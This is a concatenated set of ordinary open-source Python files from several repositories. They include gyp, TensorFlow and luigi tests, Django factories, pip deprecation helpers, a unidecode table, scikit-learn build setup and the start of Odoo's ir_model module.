def url(self):
return self.plugin_url(SetupWizardPlugin, "setupwizard")
|
prakashwaghwani/rails-vs-mean-stack
|
refs/heads/gh-pages
|
node_modules/node-gyp/gyp/pylib/gyp/common_test.py
|
2542
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for the common.py file."""
import gyp.common
import unittest
import sys
class TestTopologicallySorted(unittest.TestCase):
def test_Valid(self):
"""Test that sorting works on a valid graph with one possible order."""
graph = {
'a': ['b', 'c'],
'b': [],
'c': ['d'],
'd': ['b'],
}
def GetEdge(node):
return tuple(graph[node])
self.assertEqual(
gyp.common.TopologicallySorted(graph.keys(), GetEdge),
['a', 'c', 'd', 'b'])
def test_Cycle(self):
"""Test that an exception is thrown on a cyclic graph."""
graph = {
'a': ['b'],
'b': ['c'],
'c': ['d'],
'd': ['a'],
}
def GetEdge(node):
return tuple(graph[node])
self.assertRaises(
gyp.common.CycleError, gyp.common.TopologicallySorted,
graph.keys(), GetEdge)
class TestGetFlavor(unittest.TestCase):
"""Test that gyp.common.GetFlavor works as intended"""
original_platform = ''
def setUp(self):
self.original_platform = sys.platform
def tearDown(self):
sys.platform = self.original_platform
def assertFlavor(self, expected, argument, param):
sys.platform = argument
self.assertEqual(expected, gyp.common.GetFlavor(param))
def test_platform_default(self):
self.assertFlavor('freebsd', 'freebsd9' , {})
self.assertFlavor('freebsd', 'freebsd10', {})
self.assertFlavor('openbsd', 'openbsd5' , {})
self.assertFlavor('solaris', 'sunos5' , {});
self.assertFlavor('solaris', 'sunos' , {});
self.assertFlavor('linux' , 'linux2' , {});
self.assertFlavor('linux' , 'linux3' , {});
def test_param(self):
self.assertFlavor('foobar', 'linux2' , {'flavor': 'foobar'})
if __name__ == '__main__':
unittest.main()
|
tomasjames/citsciportal
|
refs/heads/master
|
app/agentex/tests/factories.py
|
2
|
import factory
import factory.django
import agentex.models as models
import datetime
import random
'''
This file contains all of the factories used to emulate/override the
models found in models.py for testing purposes.
'''
class EventFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Event
# This class is essential. It allows factory_boy to generate the correct model
# in order to duplicate correctly
# These are replacement objects to take the place of the originals found in
# the original models
name = 'trenzalore'
finder = long(random.randint(0,500))
class DataSourceFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.DataSource
id = long(random.randint(0,50))
timestamp = datetime.datetime.now
# factory.SubFactory is the equivalent of a ForeignKey and allows the
# individual factories to link to one another much in the way that
# ForeignKey allows
event = factory.SubFactory(EventFactory)
class CatSourceFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CatSource
id = random.randint(0,50)
name = 'Raxacoricofallapatorius'
data = factory.SubFactory(DataSourceFactory)
class DatapointFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Datapoint
data = factory.SubFactory(DataSourceFactory)
source = factory.SubFactory(CatSourceFactory)
class DecisionFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Decision
source = factory.SubFactory(CatSourceFactory)
planet = factory.SubFactory(EventFactory)
value = float(random.randint(0,500))
|
eadgarchen/tensorflow
|
refs/heads/master
|
tensorflow/python/training/server_lib_same_variables_clear_test.py
|
133
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.GrpcServer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.client import session
from tensorflow.python.framework import errors_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import server_lib
class SameVariablesClearTest(test.TestCase):
# Verifies behavior of tf.Session.reset().
# TODO(b/34465411): Starting multiple servers with different configurations
# in the same test is flaky. Move this test case back into
# "server_lib_test.py" when this is no longer the case.
def testSameVariablesClear(self):
server = server_lib.Server.create_local_server()
# Creates a graph with 2 variables.
v0 = variables.Variable([[2, 1]], name="v0")
v1 = variables.Variable([[1], [2]], name="v1")
v2 = math_ops.matmul(v0, v1)
# Verifies that both sessions connecting to the same target return
# the same results.
sess_1 = session.Session(server.target)
sess_2 = session.Session(server.target)
sess_1.run(variables.global_variables_initializer())
self.assertAllEqual([[4]], sess_1.run(v2))
self.assertAllEqual([[4]], sess_2.run(v2))
# Resets target. sessions abort. Use sess_2 to verify.
session.Session.reset(server.target)
with self.assertRaises(errors_impl.AbortedError):
self.assertAllEqual([[4]], sess_2.run(v2))
# Connects to the same target. Device memory for the variables would have
# been released, so they will be uninitialized.
sess_2 = session.Session(server.target)
with self.assertRaises(errors_impl.FailedPreconditionError):
sess_2.run(v2)
# Reinitializes the variables.
sess_2.run(variables.global_variables_initializer())
self.assertAllEqual([[4]], sess_2.run(v2))
sess_2.close()
if __name__ == "__main__":
test.main()
|
miguelparaiso/OdooAccessible
|
refs/heads/master
|
openerp/addons/test_exceptions/__openerp__.py
|
435
|
# -*- coding: utf-8 -*-
{
'name': 'test-exceptions',
'version': '0.1',
'category': 'Tests',
'description': """A module to generate exceptions.""",
'author': 'OpenERP SA',
'maintainer': 'OpenERP SA',
'website': 'http://www.openerp.com',
'depends': ['base'],
'data': ['view.xml', 'ir.model.access.csv'],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
blindpenguin/blackboard
|
refs/heads/master
|
node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/MSVSUserFile.py
|
2710
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Visual Studio user preferences file writer."""
import os
import re
import socket # for gethostname
import gyp.common
import gyp.easy_xml as easy_xml
#------------------------------------------------------------------------------
def _FindCommandInPath(command):
"""If there are no slashes in the command given, this function
searches the PATH env to find the given command, and converts it
to an absolute path. We have to do this because MSVS is looking
for an actual file to launch a debugger on, not just a command
line. Note that this happens at GYP time, so anything needing to
be built needs to have a full path."""
if '/' in command or '\\' in command:
# If the command already has path elements (either relative or
# absolute), then assume it is constructed properly.
return command
else:
# Search through the path list and find an existing file that
# we can access.
paths = os.environ.get('PATH','').split(os.pathsep)
for path in paths:
item = os.path.join(path, command)
if os.path.isfile(item) and os.access(item, os.X_OK):
return item
return command
def _QuoteWin32CommandLineArgs(args):
new_args = []
for arg in args:
# Replace all double-quotes with double-double-quotes to escape
# them for cmd shell, and then quote the whole thing if there
# are any.
if arg.find('"') != -1:
arg = '""'.join(arg.split('"'))
arg = '"%s"' % arg
# Otherwise, if there are any spaces, quote the whole arg.
elif re.search(r'[ \t\n]', arg):
arg = '"%s"' % arg
new_args.append(arg)
return new_args
class Writer(object):
"""Visual Studio XML user user file writer."""
def __init__(self, user_file_path, version, name):
"""Initializes the user file.
Args:
user_file_path: Path to the user file.
version: Version info.
name: Name of the user file.
"""
self.user_file_path = user_file_path
self.version = version
self.name = name
self.configurations = {}
def AddConfig(self, name):
"""Adds a configuration to the project.
Args:
name: Configuration name.
"""
self.configurations[name] = ['Configuration', {'Name': name}]
def AddDebugSettings(self, config_name, command, environment = {},
working_directory=""):
"""Adds a DebugSettings node to the user file for a particular config.
Args:
command: command line to run. First element in the list is the
executable. All elements of the command will be quoted if
necessary.
working_directory: other files which may trigger the rule. (optional)
"""
command = _QuoteWin32CommandLineArgs(command)
abs_command = _FindCommandInPath(command[0])
if environment and isinstance(environment, dict):
env_list = ['%s="%s"' % (key, val)
for (key,val) in environment.iteritems()]
environment = ' '.join(env_list)
else:
environment = ''
n_cmd = ['DebugSettings',
{'Command': abs_command,
'WorkingDirectory': working_directory,
'CommandArguments': " ".join(command[1:]),
'RemoteMachine': socket.gethostname(),
'Environment': environment,
'EnvironmentMerge': 'true',
# Currently these are all "dummy" values that we're just setting
# in the default manner that MSVS does it. We could use some of
# these to add additional capabilities, I suppose, but they might
# not have parity with other platforms then.
'Attach': 'false',
'DebuggerType': '3', # 'auto' debugger
'Remote': '1',
'RemoteCommand': '',
'HttpUrl': '',
'PDBPath': '',
'SQLDebugging': '',
'DebuggerFlavor': '0',
'MPIRunCommand': '',
'MPIRunArguments': '',
'MPIRunWorkingDirectory': '',
'ApplicationCommand': '',
'ApplicationArguments': '',
'ShimCommand': '',
'MPIAcceptMode': '',
'MPIAcceptFilter': ''
}]
# Find the config, and add it if it doesn't exist.
if config_name not in self.configurations:
self.AddConfig(config_name)
# Add the DebugSettings onto the appropriate config.
self.configurations[config_name].append(n_cmd)
def WriteIfChanged(self):
"""Writes the user file."""
configs = ['Configurations']
for config, spec in sorted(self.configurations.iteritems()):
configs.append(spec)
content = ['VisualStudioUserFile',
{'Version': self.version.ProjectVersion(),
'Name': self.name
},
configs]
easy_xml.WriteXmlIfChanged(content, self.user_file_path,
encoding="Windows-1252")
|
jrichte43/ProjectEuler
|
refs/heads/develop
|
Problem-0440/solutions.py
|
1
|
__problem_title__ = "GCD and Tiling"
__problem_url___ = "https://projecteuler.net/problem=440"
__problem_description__ = "We want to tile a board of length and height 1 completely, with " \
"either 1 × 2 blocks or 1 × 1 blocks with a single decimal digit on " \
"top: For example, here are some of the ways to tile a board of length " \
"= 8: Let T( ) be the number of ways to tile a board of length as " \
"described above. For example, T(1) = 10 and T(2) = 101. Let S( ) be " \
"the triple sum ∑ gcd(T( ), T( )) for 1 ≤ , , ≤ . For example: S(2) = " \
"10444 S(3) = 1292115238446807016106539989 S(4) mod 987 898 789 = " \
"670616280. Find S(2000) mod 987 898 789."
import timeit
class Solution():
@staticmethod
def solution1():
pass
@staticmethod
def time_solutions():
setup = 'from __main__ import Solution'
print('Solution 1:', timeit.timeit('Solution.solution1()', setup=setup, number=1))
if __name__ == '__main__':
s = Solution()
print(s.solution1())
s.time_solutions()
|
rayrrr/luigi
|
refs/heads/master
|
test/contrib/gcs_test.py
|
9
|
# -*- coding: utf-8 -*-
#
# Copyright 2015 Twitter Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""This is an integration test for the GCS-luigi binding.
This test requires credentials that can access GCS & access to a bucket below.
Follow the directions in the gcloud tools to set up local credentials.
"""
from helpers import unittest
try:
import googleapiclient.errors
import google.auth
except ImportError:
raise unittest.SkipTest('Unable to load googleapiclient module')
import os
import tempfile
import unittest
from luigi.contrib import gcs
from target_test import FileSystemTargetTestMixin
from nose.plugins.attrib import attr
# In order to run this test, you should set these to your GCS project/bucket.
# Unfortunately there's no mock
PROJECT_ID = os.environ.get('GCS_TEST_PROJECT_ID', 'your_project_id_here')
BUCKET_NAME = os.environ.get('GCS_TEST_BUCKET', 'your_test_bucket_here')
TEST_FOLDER = os.environ.get('TRAVIS_BUILD_ID', 'gcs_test_folder')
CREDENTIALS, _ = google.auth.default()
ATTEMPTED_BUCKET_CREATE = False
def bucket_url(suffix):
"""
Actually it's bucket + test folder name
"""
return 'gs://{}/{}/{}'.format(BUCKET_NAME, TEST_FOLDER, suffix)
class _GCSBaseTestCase(unittest.TestCase):
def setUp(self):
self.client = gcs.GCSClient(CREDENTIALS)
global ATTEMPTED_BUCKET_CREATE
if not ATTEMPTED_BUCKET_CREATE:
try:
self.client.client.buckets().insert(
project=PROJECT_ID, body={'name': BUCKET_NAME}).execute()
except googleapiclient.errors.HttpError as ex:
if ex.resp.status != 409: # bucket already exists
raise
ATTEMPTED_BUCKET_CREATE = True
self.client.remove(bucket_url(''), recursive=True)
self.client.mkdir(bucket_url(''))
def tearDown(self):
self.client.remove(bucket_url(''), recursive=True)
@attr('gcloud')
class GCSClientTest(_GCSBaseTestCase):
def test_not_exists(self):
self.assertFalse(self.client.exists(bucket_url('does_not_exist')))
self.assertFalse(self.client.isdir(bucket_url('does_not_exist')))
def test_exists(self):
self.client.put_string('hello', bucket_url('exists_test'))
self.assertTrue(self.client.exists(bucket_url('exists_test')))
self.assertFalse(self.client.isdir(bucket_url('exists_test')))
def test_mkdir(self):
self.client.mkdir(bucket_url('exists_dir_test'))
self.assertTrue(self.client.exists(bucket_url('exists_dir_test')))
self.assertTrue(self.client.isdir(bucket_url('exists_dir_test')))
def test_mkdir_by_upload(self):
self.client.put_string('hello', bucket_url('test_dir_recursive/yep/file'))
self.assertTrue(self.client.exists(bucket_url('test_dir_recursive')))
self.assertTrue(self.client.isdir(bucket_url('test_dir_recursive')))
def test_download(self):
self.client.put_string('hello', bucket_url('test_download'))
fp = self.client.download(bucket_url('test_download'))
self.assertEqual(b'hello', fp.read())
def test_rename(self):
self.client.put_string('hello', bucket_url('test_rename_1'))
self.client.rename(bucket_url('test_rename_1'), bucket_url('test_rename_2'))
self.assertFalse(self.client.exists(bucket_url('test_rename_1')))
self.assertTrue(self.client.exists(bucket_url('test_rename_2')))
def test_rename_recursive(self):
self.client.mkdir(bucket_url('test_rename_recursive'))
self.client.put_string('hello', bucket_url('test_rename_recursive/1'))
self.client.put_string('hello', bucket_url('test_rename_recursive/2'))
self.client.rename(bucket_url('test_rename_recursive'), bucket_url('test_rename_recursive_dest'))
self.assertFalse(self.client.exists(bucket_url('test_rename_recursive')))
self.assertFalse(self.client.exists(bucket_url('test_rename_recursive/1')))
self.assertTrue(self.client.exists(bucket_url('test_rename_recursive_dest')))
self.assertTrue(self.client.exists(bucket_url('test_rename_recursive_dest/1')))
def test_remove(self):
self.client.put_string('hello', bucket_url('test_remove'))
self.client.remove(bucket_url('test_remove'))
self.assertFalse(self.client.exists(bucket_url('test_remove')))
def test_remove_recursive(self):
self.client.mkdir(bucket_url('test_remove_recursive'))
self.client.put_string('hello', bucket_url('test_remove_recursive/1'))
self.client.put_string('hello', bucket_url('test_remove_recursive/2'))
self.client.remove(bucket_url('test_remove_recursive'))
self.assertFalse(self.client.exists(bucket_url('test_remove_recursive')))
self.assertFalse(self.client.exists(bucket_url('test_remove_recursive/1')))
self.assertFalse(self.client.exists(bucket_url('test_remove_recursive/2')))
def test_listdir(self):
self.client.put_string('hello', bucket_url('test_listdir/1'))
self.client.put_string('hello', bucket_url('test_listdir/2'))
self.assertEqual([bucket_url('test_listdir/1'), bucket_url('test_listdir/2')],
list(self.client.listdir(bucket_url('test_listdir/'))))
self.assertEqual([bucket_url('test_listdir/1'), bucket_url('test_listdir/2')],
list(self.client.listdir(bucket_url('test_listdir'))))
def test_put_file(self):
with tempfile.NamedTemporaryFile() as fp:
lorem = 'Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt\n'
# Larger file than chunk size, fails with incorrect progress set up
big = lorem * 41943
fp.write(big)
fp.flush()
self.client.put(fp.name, bucket_url('test_put_file'))
self.assertTrue(self.client.exists(bucket_url('test_put_file')))
self.assertEqual(big, self.client.download(bucket_url('test_put_file')).read())
def test_put_file_multiproc(self):
temporary_fps = []
for _ in range(2):
fp = tempfile.NamedTemporaryFile(mode='wb')
lorem = b'Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt\n'
# Larger file than chunk size, fails with incorrect progress set up
big = lorem * 41943
fp.write(big)
fp.flush()
temporary_fps.append(fp)
filepaths = [f.name for f in temporary_fps]
self.client.put_multiple(filepaths, bucket_url(''), num_process=2)
for fp in temporary_fps:
basename = os.path.basename(fp.name)
self.assertTrue(self.client.exists(bucket_url(basename)))
self.assertEqual(big, self.client.download(bucket_url(basename)).read())
fp.close()
@attr('gcloud')
class GCSTargetTest(_GCSBaseTestCase, FileSystemTargetTestMixin):
def create_target(self, format=None):
return gcs.GCSTarget(bucket_url(self.id()), format=format, client=self.client)
def test_close_twice(self):
# Ensure gcs._DeleteOnCloseFile().close() can be called multiple times
tgt = self.create_target()
with tgt.open('w') as dst:
dst.write('data')
assert dst.closed
dst.close()
assert dst.closed
with tgt.open() as src:
assert src.read().strip() == 'data'
assert src.closed
src.close()
assert src.closed
|
talhajaved/nyuadmarket
|
refs/heads/master
|
flask/lib/python2.7/site-packages/pip/utils/deprecation.py
|
122
|
"""
A module that implments tooling to enable easy warnings about deprecations.
"""
from __future__ import absolute_import
import logging
import warnings
class PipDeprecationWarning(Warning):
pass
class RemovedInPip7Warning(PipDeprecationWarning, DeprecationWarning):
pass
class RemovedInPip8Warning(PipDeprecationWarning, PendingDeprecationWarning):
pass
DEPRECATIONS = [RemovedInPip7Warning, RemovedInPip8Warning]
# Warnings <-> Logging Integration
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(
message, category, filename, lineno, file, line,
)
else:
if issubclass(category, PipDeprecationWarning):
# We use a specially named logger which will handle all of the
# deprecation messages for pip.
logger = logging.getLogger("pip.deprecations")
# This is purposely using the % formatter here instead of letting
# the logging module handle the interpolation. This is because we
# want it to appear as if someone typed this entire message out.
log_message = "DEPRECATION: %s" % message
# Things that are DeprecationWarnings will be removed in the very
# next version of pip. We want these to be more obvious so we
# use the ERROR logging level while the PendingDeprecationWarnings
# are still have at least 2 versions to go until they are removed
# so they can just be warnings.
if issubclass(category, DeprecationWarning):
logger.error(log_message)
else:
logger.warning(log_message)
else:
_warnings_showwarning(
message, category, filename, lineno, file, line,
)
def install_warning_logger():
global _warnings_showwarning
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
|
chirilo/mozillians
|
refs/heads/master
|
vendor-local/lib/python/unidecode/x08e.py
|
252
|
data = (
'Chu ', # 0x00
'Jing ', # 0x01
'Nie ', # 0x02
'Xiao ', # 0x03
'Bo ', # 0x04
'Chi ', # 0x05
'Qun ', # 0x06
'Mou ', # 0x07
'Shu ', # 0x08
'Lang ', # 0x09
'Yong ', # 0x0a
'Jiao ', # 0x0b
'Chou ', # 0x0c
'Qiao ', # 0x0d
'[?] ', # 0x0e
'Ta ', # 0x0f
'Jian ', # 0x10
'Qi ', # 0x11
'Wo ', # 0x12
'Wei ', # 0x13
'Zhuo ', # 0x14
'Jie ', # 0x15
'Ji ', # 0x16
'Nie ', # 0x17
'Ju ', # 0x18
'Ju ', # 0x19
'Lun ', # 0x1a
'Lu ', # 0x1b
'Leng ', # 0x1c
'Huai ', # 0x1d
'Ju ', # 0x1e
'Chi ', # 0x1f
'Wan ', # 0x20
'Quan ', # 0x21
'Ti ', # 0x22
'Bo ', # 0x23
'Zu ', # 0x24
'Qie ', # 0x25
'Ji ', # 0x26
'Cu ', # 0x27
'Zong ', # 0x28
'Cai ', # 0x29
'Zong ', # 0x2a
'Peng ', # 0x2b
'Zhi ', # 0x2c
'Zheng ', # 0x2d
'Dian ', # 0x2e
'Zhi ', # 0x2f
'Yu ', # 0x30
'Duo ', # 0x31
'Dun ', # 0x32
'Chun ', # 0x33
'Yong ', # 0x34
'Zhong ', # 0x35
'Di ', # 0x36
'Zhe ', # 0x37
'Chen ', # 0x38
'Chuai ', # 0x39
'Jian ', # 0x3a
'Gua ', # 0x3b
'Tang ', # 0x3c
'Ju ', # 0x3d
'Fu ', # 0x3e
'Zu ', # 0x3f
'Die ', # 0x40
'Pian ', # 0x41
'Rou ', # 0x42
'Nuo ', # 0x43
'Ti ', # 0x44
'Cha ', # 0x45
'Tui ', # 0x46
'Jian ', # 0x47
'Dao ', # 0x48
'Cuo ', # 0x49
'Xi ', # 0x4a
'Ta ', # 0x4b
'Qiang ', # 0x4c
'Zhan ', # 0x4d
'Dian ', # 0x4e
'Ti ', # 0x4f
'Ji ', # 0x50
'Nie ', # 0x51
'Man ', # 0x52
'Liu ', # 0x53
'Zhan ', # 0x54
'Bi ', # 0x55
'Chong ', # 0x56
'Lu ', # 0x57
'Liao ', # 0x58
'Cu ', # 0x59
'Tang ', # 0x5a
'Dai ', # 0x5b
'Suo ', # 0x5c
'Xi ', # 0x5d
'Kui ', # 0x5e
'Ji ', # 0x5f
'Zhi ', # 0x60
'Qiang ', # 0x61
'Di ', # 0x62
'Man ', # 0x63
'Zong ', # 0x64
'Lian ', # 0x65
'Beng ', # 0x66
'Zao ', # 0x67
'Nian ', # 0x68
'Bie ', # 0x69
'Tui ', # 0x6a
'Ju ', # 0x6b
'Deng ', # 0x6c
'Ceng ', # 0x6d
'Xian ', # 0x6e
'Fan ', # 0x6f
'Chu ', # 0x70
'Zhong ', # 0x71
'Dun ', # 0x72
'Bo ', # 0x73
'Cu ', # 0x74
'Zu ', # 0x75
'Jue ', # 0x76
'Jue ', # 0x77
'Lin ', # 0x78
'Ta ', # 0x79
'Qiao ', # 0x7a
'Qiao ', # 0x7b
'Pu ', # 0x7c
'Liao ', # 0x7d
'Dun ', # 0x7e
'Cuan ', # 0x7f
'Kuang ', # 0x80
'Zao ', # 0x81
'Ta ', # 0x82
'Bi ', # 0x83
'Bi ', # 0x84
'Zhu ', # 0x85
'Ju ', # 0x86
'Chu ', # 0x87
'Qiao ', # 0x88
'Dun ', # 0x89
'Chou ', # 0x8a
'Ji ', # 0x8b
'Wu ', # 0x8c
'Yue ', # 0x8d
'Nian ', # 0x8e
'Lin ', # 0x8f
'Lie ', # 0x90
'Zhi ', # 0x91
'Li ', # 0x92
'Zhi ', # 0x93
'Chan ', # 0x94
'Chu ', # 0x95
'Duan ', # 0x96
'Wei ', # 0x97
'Long ', # 0x98
'Lin ', # 0x99
'Xian ', # 0x9a
'Wei ', # 0x9b
'Zuan ', # 0x9c
'Lan ', # 0x9d
'Xie ', # 0x9e
'Rang ', # 0x9f
'Xie ', # 0xa0
'Nie ', # 0xa1
'Ta ', # 0xa2
'Qu ', # 0xa3
'Jie ', # 0xa4
'Cuan ', # 0xa5
'Zuan ', # 0xa6
'Xi ', # 0xa7
'Kui ', # 0xa8
'Jue ', # 0xa9
'Lin ', # 0xaa
'Shen ', # 0xab
'Gong ', # 0xac
'Dan ', # 0xad
'Segare ', # 0xae
'Qu ', # 0xaf
'Ti ', # 0xb0
'Duo ', # 0xb1
'Duo ', # 0xb2
'Gong ', # 0xb3
'Lang ', # 0xb4
'Nerau ', # 0xb5
'Luo ', # 0xb6
'Ai ', # 0xb7
'Ji ', # 0xb8
'Ju ', # 0xb9
'Tang ', # 0xba
'Utsuke ', # 0xbb
'[?] ', # 0xbc
'Yan ', # 0xbd
'Shitsuke ', # 0xbe
'Kang ', # 0xbf
'Qu ', # 0xc0
'Lou ', # 0xc1
'Lao ', # 0xc2
'Tuo ', # 0xc3
'Zhi ', # 0xc4
'Yagate ', # 0xc5
'Ti ', # 0xc6
'Dao ', # 0xc7
'Yagate ', # 0xc8
'Yu ', # 0xc9
'Che ', # 0xca
'Ya ', # 0xcb
'Gui ', # 0xcc
'Jun ', # 0xcd
'Wei ', # 0xce
'Yue ', # 0xcf
'Xin ', # 0xd0
'Di ', # 0xd1
'Xuan ', # 0xd2
'Fan ', # 0xd3
'Ren ', # 0xd4
'Shan ', # 0xd5
'Qiang ', # 0xd6
'Shu ', # 0xd7
'Tun ', # 0xd8
'Chen ', # 0xd9
'Dai ', # 0xda
'E ', # 0xdb
'Na ', # 0xdc
'Qi ', # 0xdd
'Mao ', # 0xde
'Ruan ', # 0xdf
'Ren ', # 0xe0
'Fan ', # 0xe1
'Zhuan ', # 0xe2
'Hong ', # 0xe3
'Hu ', # 0xe4
'Qu ', # 0xe5
'Huang ', # 0xe6
'Di ', # 0xe7
'Ling ', # 0xe8
'Dai ', # 0xe9
'Ao ', # 0xea
'Zhen ', # 0xeb
'Fan ', # 0xec
'Kuang ', # 0xed
'Ang ', # 0xee
'Peng ', # 0xef
'Bei ', # 0xf0
'Gu ', # 0xf1
'Ku ', # 0xf2
'Pao ', # 0xf3
'Zhu ', # 0xf4
'Rong ', # 0xf5
'E ', # 0xf6
'Ba ', # 0xf7
'Zhou ', # 0xf8
'Zhi ', # 0xf9
'Yao ', # 0xfa
'Ke ', # 0xfb
'Yi ', # 0xfc
'Qing ', # 0xfd
'Shi ', # 0xfe
'Ping ', # 0xff
)
|
jayceyxc/hue
|
refs/heads/master
|
desktop/core/ext-py/pycparser-2.14/examples/c-to-c.py
|
19
|
#------------------------------------------------------------------------------
# pycparser: c-to-c.py
#
# Example of using pycparser.c_generator, serving as a simplistic translator
# from C to AST and back to C.
#
# Copyright (C) 2008-2015, Eli Bendersky
# License: BSD
#------------------------------------------------------------------------------
from __future__ import print_function
import sys
# This is not required if you've installed pycparser into
# your site-packages/ with setup.py
#
sys.path.extend(['.', '..'])
from pycparser import parse_file, c_parser, c_generator
def translate_to_c(filename):
""" Simply use the c_generator module to emit a parsed AST.
"""
ast = parse_file(filename, use_cpp=True)
generator = c_generator.CGenerator()
print(generator.visit(ast))
def _zz_test_translate():
# internal use
src = r'''
void f(char * restrict joe){}
int main(void)
{
unsigned int long k = 4;
int p = - - k;
return 0;
}
'''
parser = c_parser.CParser()
ast = parser.parse(src)
ast.show()
generator = c_generator.CGenerator()
print(generator.visit(ast))
# tracing the generator for debugging
#~ import trace
#~ tr = trace.Trace(countcallers=1)
#~ tr.runfunc(generator.visit, ast)
#~ tr.results().write_results()
#------------------------------------------------------------------------------
if __name__ == "__main__":
#_zz_test_translate()
if len(sys.argv) > 1:
translate_to_c(sys.argv[1])
else:
print("Please provide a filename as argument")
|
shuggiefisher/crowdstock
|
refs/heads/master
|
django/conf/app_template/views.py
|
6027
|
# Create your views here.
|
Sklearn-HMM/scikit-learn-HMM
|
refs/heads/master
|
sklean-hmm/svm/setup.py
|
8
|
from os.path import join
import numpy
import warnings
def configuration(parent_package='', top_path=None):
from numpy.distutils.misc_util import Configuration
from numpy.distutils.system_info import get_info, BlasNotFoundError
config = Configuration('svm', parent_package, top_path)
config.add_subpackage('tests')
# Section LibSVM
# we compile both libsvm and libsvm_sparse
config.add_library('libsvm-skl',
sources=[join('src', 'libsvm', 'libsvm_template.cpp')],
depends=[join('src', 'libsvm', 'svm.cpp'),
join('src', 'libsvm', 'svm.h')],
# Force C++ linking in case gcc is picked up instead
# of g++ under windows with some versions of MinGW
extra_link_args=['-lstdc++'],
)
libsvm_sources = ['libsvm.c']
libsvm_depends = [join('src', 'libsvm', 'libsvm_helper.c'),
join('src', 'libsvm', 'libsvm_template.cpp'),
join('src', 'libsvm', 'svm.cpp'),
join('src', 'libsvm', 'svm.h')]
config.add_extension('libsvm',
sources=libsvm_sources,
include_dirs=[numpy.get_include(),
join('src', 'libsvm')],
libraries=['libsvm-skl'],
depends=libsvm_depends,
)
### liblinear module
blas_sources = [join('src', 'blas', 'daxpy.c'),
join('src', 'blas', 'ddot.c'),
join('src', 'blas', 'dnrm2.c'),
join('src', 'blas', 'dscal.c')]
liblinear_sources = ['liblinear.c',
join('src', 'liblinear', '*.cpp')]
liblinear_depends = [join('src', 'liblinear', '*.h'),
join('src', 'liblinear', 'liblinear_helper.c')]
# we try to link against system-wide blas
blas_info = get_info('blas_opt', 0)
if not blas_info:
config.add_library('blas', blas_sources)
warnings.warn(BlasNotFoundError.__doc__)
config.add_extension('liblinear',
sources=liblinear_sources,
libraries=blas_info.pop('libraries', ['blas']),
include_dirs=['src',
numpy.get_include(),
blas_info.pop('include_dirs', [])],
depends=liblinear_depends,
# extra_compile_args=['-O0 -fno-inline'],
** blas_info)
## end liblinear module
# this should go *after* libsvm-skl
libsvm_sparse_sources = ['libsvm_sparse.c']
config.add_extension('libsvm_sparse', libraries=['libsvm-skl'],
sources=libsvm_sparse_sources,
include_dirs=[numpy.get_include(),
join("src", "libsvm")],
depends=[join("src", "libsvm", "svm.h"),
join("src", "libsvm",
"libsvm_sparse_helper.c")])
return config
if __name__ == '__main__':
from numpy.distutils.core import setup
setup(**configuration(top_path='').todict())
|
galtys/odoo
|
refs/heads/8.0
|
openerp/addons/base/ir/ir_model.py
|
30
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2014 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from collections import defaultdict
import logging
import re
import time
import types
import openerp
from openerp import SUPERUSER_ID
from openerp import models, tools, api
from openerp.modules.registry import RegistryManager
from openerp.osv import fields, osv
from openerp.osv.orm import BaseModel, Model, MAGIC_COLUMNS, except_orm
from openerp.tools import config
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
MODULE_UNINSTALL_FLAG = '_force_unlink'
def _get_fields_type(self, cr, uid, context=None):
# Avoid too many nested `if`s below, as RedHat's Python 2.6
# break on it. See bug 939653.
return sorted([(k,k) for k,v in fields.__dict__.iteritems()
if type(v) == types.TypeType and \
issubclass(v, fields._column) and \
v != fields._column and \
not v._deprecated and \
not issubclass(v, fields.function)])
def _in_modules(self, cr, uid, ids, field_name, arg, context=None):
